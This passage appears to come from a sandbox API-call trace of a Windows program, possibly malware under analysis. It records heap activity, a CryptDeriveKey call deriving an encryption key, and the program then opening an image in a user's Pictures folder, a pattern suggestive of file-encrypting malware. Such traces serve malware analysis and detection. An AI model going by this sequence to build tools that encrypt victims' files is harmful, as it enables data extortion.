Flags=0x0, Size=0x10) returned 0x2e51700 [0252.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0252.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0252.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0252.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0252.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0252.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0252.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0252.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0252.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0252.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0252.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0252.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51aa8 [0252.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51aa8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0252.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.682] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0252.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0252.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0252.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0252.683] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87050) returned 1 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0252.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0252.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0252.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0252.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0252.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0252.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0252.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0252.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0252.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0252.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0252.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0252.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0252.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0252.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0252.689] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0252.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.689] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0252.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0252.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0252.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0252.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0252.690] CryptDestroyHash (hHash=0xa87310) returned 1 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.690] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0252.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0252.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0252.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0252.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0252.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0252.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0252.692] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/SWfcb.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\swfcb.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0252.693] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.693] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0252.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0252.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0252.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 